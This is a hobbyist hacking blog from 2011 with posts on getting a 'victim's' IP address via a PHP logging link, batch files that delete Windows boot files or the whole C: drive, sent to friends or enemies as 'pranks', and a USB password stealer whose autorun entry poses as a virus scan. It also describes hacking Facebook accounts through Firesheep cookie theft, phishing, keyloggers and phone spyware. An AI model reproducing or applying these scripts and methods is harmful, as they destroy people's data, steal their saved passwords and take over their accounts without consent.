Like us on facebook and stay updated! Click here


Featured Video

FACEBOOK HACKING

learn to hack facebook accounts.and learn facebook hidden tips and tricks.

GOOGLE ACCOUNT HACKING

Learn to hack G mail,orkut or any google accounts and learn hidden google tricks.

COMPUTER TIPS AND TRICKS

Learn about Computers and how to hack Computer.hidden and funny Computer tips and tricks.

LEARN ALL ABOUT COMPUTER VIRUS

learn to make virus and how virus works.learn how to prevent virus attacks.

LEARN REAL HACKING FROM COOLGURU007

Learn the Real Hacking tricks and tips for free from CoolGuru007.

Friday 16 December 2011

How to get IP address of another computer remotely





 Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it.


There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.




4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and yahoo chat  sessions

What is an IP address? 
Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication). 

IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

For exploring more about IP addressing read on wikipedia.


How to Find IP address of another computer?

1. Using PHP notification Script
Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:
a.
code:

<?
?> 
<?php 
    $day = date("l"); 
    $month = date("F"); 
    $year = date("Y"); 
    $date = date("jS"); 
    $hours = date("g"); 
    $minutes = date("i"); 
    $tod = date("A"); 
     
    if(substr($minutes, 0, 1) == 0) 
        $minutes = substr($minutes, 1, 2); 
?> 
<? 
$ip = $_SERVER['REMOTE_ADDR']; 
?> 
<? 
$fp=fopen("ip.html","a"); 
fputs($fp,"$ip*");
fclose($fp);
?> 
save it as index.php
now create a .html file, ip.html
or simply 
 Download the PHP notify script and extract files.

b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.
Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there as shown below.


c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.
d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.
e. That's all this method... I


2. Using Blogs and Websites
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.
That's only.


3. Using Read Notify service
This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated. 
Do the following steps use this service:

  1. Compose your email just like you usually would in your own email or web email program
  2. Type:   .readnotify.com   on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: ABC@gmail.com.readnotify.com  
  3. Send your email
Some things to remember: 
  • don't send to and from the same computer
  • if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
  • if you are cc-ing your email to other readers, you must add tracking to all of them 


4.  Sniffing Yahoo and Gmail Chat sessions
With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there.
5. Bonus Method for Online Gamers
We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server.  If you have more access to counter strike server you can use status command in console. Just go to console and type "status"(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.
:)

Saturday 3 December 2011

DESTROY ANY COMPUTER EASILY WITH ONE CLICK




Do not try this at your own computer: Well remember that u don’t try this @ ur own computer in any circumstances becausethe file we are going to create will reboot the computer onceand also delete all the file needed by the computer to restartagain ,so u got it right well if u r pranking with ur friend or ur enemy remember that his or her will never restart unless new Windows is installed.

Here is the Guide to Destroying Virus:
Open up notepad and copy and paste this:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

And SAVE this file as .bat
Now that’s it ur Virus is ready well it’s a Monster Virus .
Remember Don’t click on this file in ur Computer.

USE ANY USB STICK AS RAM !



Windows Vista has a handy little feature called ReadyBoost that can use USB sticks for additional memory.
 Unfortunately, Windows Vista doesn't take kindly to the slower sticks on the market and refuses to use them. Proving once again that we control the computer and not the other way around, here's four simple steps to get around this limitation and use any USB stick you have to increase your computers memory.



{1}Setup

First things first. Plug the device in.
Ignore AutoPlay if you have the enabled,
and go to Computer in the start menu.
When it pops up, right-click the USB stick
and select properties.

{2} Disable the stick

Click on the Readyboost tab on the properties menu and check Do not restest this device. Click okay and unplug the stick from your computer.


{3} Edit the registry!

Firstly, you need to open regedit,
by opening the start menu and typing regedit, then enter.
The registry window should load up.

Using the left-hand pane, work your way through the following folders: HKLM (Local Machine) -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> EMDgmt.
You'll have a list of USB devices the computer has encountered, one of which should be your USB stick.
Click on it.

Here there's a few details you need to edit.
Double click on Device Status and change the value to 2, then select ok.
Do the same for ReadSpeedKBs and WriteSpeedKBs, changing their values to both 1000.
Exit the regedit and breathe a sigh of relief.


{4} And back in again
Now all that's left to do is put the stick back in
and once again go to the device properties
(Computer > Right-click on drive).
 If you look under the Readyboost Tab,
 you'll be able to now select Use this device.
 Success! Now enjoy your faster PC.


BATCH FILE TRICK TO DELETE C: DRIVE


Type these commands in notepad

@Echo off
Del C:\ *.* |y


And save that as .bat 
not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NOTE::::: don't run that .bat file on your system .... it will delete c:...

PRANK:COMPUTER GHOST




This will open Notepad, slowly
type "Hello, how are you? I am good thanks" after some time of clicking the file.




IN NOTEPAD


Type :

WScript.Sleep 180000                                      
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

HOW TO HIDE THE RECYCLE BIN


To show or hide the Recycle Bin on the desktop

  1. Click the Start button Picture of the Start buttontype desktop icons into the search box, and then click Show or hide common icons on the desktop.
  2. In the Desktop Icon Settings dialog box, do one of the following:
    • To hide the Recycle Bin, clear the Recycle Bin check box.
    • To show the Recycle Bin, select the Recycle Bin check box.
  3. Click OK.
Note

Note

Even when the Recycle Bin is hidden, deleted files are still stored there temporarily until you choose to permanently delete them or recover them.

Thursday 24 November 2011

How Hackers Can Hack Facebook Accounts In 2011-top 10 ways

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers, 
read my previous post  about 4 ways to hack facebook accounts.
So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2011.


FACEBOOK PHISHING( Fake login Page.)

There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

I have explained the step by step phishing process in my post below:

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. 


want to know more about RATs ? read my previous post abouts RATs.


3. Stealers 



Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful.

4. Session Hijacking




Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. 

5. Sidejacking With Firesheep




 Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:


Method

1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser



2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep


3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly.
:)

6. Mobile Phone Hacking




Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:

1. Mobile Spy 
2. Spy Phone Gold


7. DNS Spoofing 



If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.



8. USB Hacking 

Usb password stealer
As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords, i will explain you on How to made a USB passwords stealer and steal saved passwords.

Things you will need?


MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:


Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc


IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.


Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.


Password Fox Password fox is a small program used to view Stored passwords in Mozilla Firefox.


Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:


Note:Kindly disable your antivirus before performing these steps


1.First of all download all 5 tools and copy the executables (.exe( files in your USB  i.e. Copy the files  mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from


New Text Document.txt to autorun.inf


Now copy the autorun.inf file onto your USB pendrive.




3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from


New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.


Now your USB Password stealer is ready all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it it will steal passwords.
After this you can see saved password in .TXT files

9. Man In the Middle Attacks


If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article.
f you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it.
10. Botnets 




Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

Hope you have enjoyed reading the post.
be our fan on facebook

Twitter Delicious Facebook Digg Stumbleupon Favorites More